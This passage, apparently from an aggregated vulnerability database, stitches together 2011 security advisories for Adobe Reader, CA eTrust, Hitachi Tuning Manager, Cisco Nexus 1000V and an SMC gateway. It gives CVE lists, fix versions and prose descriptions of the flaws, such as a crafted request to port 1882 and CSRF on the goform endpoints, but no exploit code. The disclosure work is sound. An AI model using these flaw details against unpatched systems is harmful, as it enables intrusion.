malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 9) An unspecified error may allow code execution. 10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 9.4.7 >= 9.4.7=20 Description =========== Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0158 CVE-2011-0758 CA ETrust Secure Content Manager and CA Gateway Securit of eCS In the component Service operation interruption (DoS) Vulnerabilities CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service a user supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking an integer can be improperly calculated leading to a heap overflow. If successfully exploited this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: CA Secure Content Manager Common Services Transport Vulnerability SECUNIA ADVISORY ID: SA43200 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43200/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43200 RELEASE DATE: 2011-02-10 DISCUSS ADVISORY: http://secunia.com/advisories/43200/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43200/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43200 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in CA Secure Content Manager, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to missing input validation in the eTrust Common Services Transport (ECSQdmn.exe) service when parsing requests and can be exploited to cause a heap-based buffer overflow via a specially crafted request sent to port 1882. * CA Gateway Security version 8.1. SOLUTION: Restrict access to the affected service. PROVIDED AND/OR DISCOVERED BY: Sebastian Apelt via ZDI. ORIGINAL ADVISORY: ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-059/ CA: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F} OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-059 February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca -- CVE ID: CVE-2011-0758 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: CA -- Affected Products: CA eTrust Secure Content Manager -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability. -- Disclosure Timeline: 2008-05-23 - Vulnerability reported to vendor 2011-02-07 - Public release of advisory -- Credit: This vulnerability was discovered by: * Sebastian Apelt (sebastian.apelt@siberas.de) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
VAR-201102-0385 No CVE Hitachi Tuning Manager Unknown Cross-Site Scripting Vulnerability CVSS V2: -
CVSS V3: -
Severity: LOW
Hitachi Tuning Manager is an automated, intelligent and path-aware storage resource management software that monitors, analyzes and audits the performance of storage network resources from applications to storage devices. Hitachi Tuning Manager has multiple input validation issues, and remote attackers can exploit vulnerabilities for cross-site scripting attacks to obtain sensitive information or hijack target user sessions. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Hitachi Tuning Manager versions 6.0.0 through 6.4.0-01 and 7.0.0 are vulnerable. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Hitachi Tuning Manager Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA43209 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43209/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43209 RELEASE DATE: 2011-02-08 DISCUSS ADVISORY: http://secunia.com/advisories/43209/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43209/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43209 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Hitachi Tuning Manager, which can be exploited by malicious people to conduct cross-site scripting attacks. Certain unspecified input is not properly sanitised before being returned to the user. The vulnerability is reported in versions 6.0.0 through 6.4.0-01 and 7.0.0 running on Windows and Solaris. SOLUTION: Update to version 6.4.0-02 or 7.0.0-01. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: HS11-002: http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-002/index.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-201102-0213 CVE-2011-0355 Cisco Nexus 1000V Virtual Ethernet Module Service disruption in (DoS) Vulnerabilities CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco Nexus 1000V Virtual Ethernet Module (VEM) 4.0(4) SV1(1) through SV1(3b), as used in VMware ESX 4.0 and 4.1 and ESXi 4.0 and 4.1, does not properly handle dropped packets, which allows guest OS users to cause a denial of service (ESX or ESXi host OS crash) by sending an 802.1Q tagged packet over an access vEthernet port, aka Cisco Bug ID CSCtj17451. The Cisco Nexus 1000V VEM is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause the affected application to crash, resulting in a denial-of-service condition. The following Cisco products are vulnerable: Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3b) Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3a) Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(3) Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(2) Cisco Nexus 1000V Virtual Ethernet Module Release 4.0(4) SV1(1) The following VMware products are vulnerable: ESXi 4.1 ESXi 4.0 ESX 4.1 ESX 4.0. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ VMware Security Advisory Advisory ID: VMSA-2011-0002 Synopsis: Cisco Nexus 1000V VEM updates address denial of service in VMware ESX/ESXi Issue date: 2011-02-07 Updated on: 2011-02-07 (initial release of advisory) CVE numbers: CVE-2011-0355 - ------------------------------------------------------------------------ 1. Summary Updated versions of the Cisco Nexus 1000V virtual switch address a denial of service in VMware ESX/ESXi. 2. Problem Description a. This switch can be added to ESX and ESXi where it replaces the VMware virtual switch and runs as part of the ESX and ESXi kernel. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2011-0355 to the issue. VMware customers are only affected by this vulnerability if they have chosen to deploy the Cisco Nexus 1000V virtual switch as a replacement for the VMware vNetwork Standard Switch or the VMware vNetwork Distributed Switch. VMware has confirmed that the VMware vNetwork Standard Switch and the VMware vNetwork Distributed Switch are not affected by the vulnerability. The issue is documented by Cisco in Cisco bug ID CSCtj17451 (see section 5 for a link). 4. References CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0355 Cisco bug ID CSCtj17451 (registered Cisco customers only) http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fe tchBugDetails&bugId=CSCtj17451 - ------------------------------------------------------------------------ 6. - ----------------------------------------------------------------------- 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2011 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8 wj8DBQFNUNTIS2KysvBH1xkRAk1hAJ9iH1j58lM5KrwVaRYccSN3rWaw/wCePyLP FHYGA7W1DEcKcOFWj7GkuHE= =srWD -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Cisco Nexus 1000V Virtual Switch 802.1Q Tagged Packet Denial of Service SECUNIA ADVISORY ID: SA43084 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43084/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43084 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43084/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43084/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43084 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Cisco Nexus 1000V, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error when processing 802.1Q tagged packets. This can be exploited to cause a crash when a virtual machine sends a packet on a vEthernet port. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Cisco (CSCtj17451): http://www.cisco.com/en/US/docs/switches/datacenter/nexus1000/sw/4_0_4_s_v_1_3_c/release/notes/n1000v_rn.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-201102-0084 CVE-2011-0886 SMC SMCD3G-CCR of Web Cross-site request forgery vulnerability in the interface CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways. Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible. Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: SMC SMCD3G-CCR Two Vulnerabilities SECUNIA ADVISORY ID: SA43199 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43199/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 RELEASE DATE: 2011-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/43199/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43199/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can be exploited by malicious people to conduct brute force and cross-site request forgery attacks. 1) The web management application generates session identifiers incrementally, which can be exploited to brute force a valid session identifier via the "userid" cookie. 2) The web management application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. enable management via Telnet by tricking an administrator into visiting a malicious web site while being logged-in to the application. SOLUTION: Reportedly fixed in firmware version 1.4.0.49.2. PROVIDED AND/OR DISCOVERED BY: Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs. ORIGINAL ADVISORY: Trustwave's SpiderLabs (TWSL2011-002): https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: 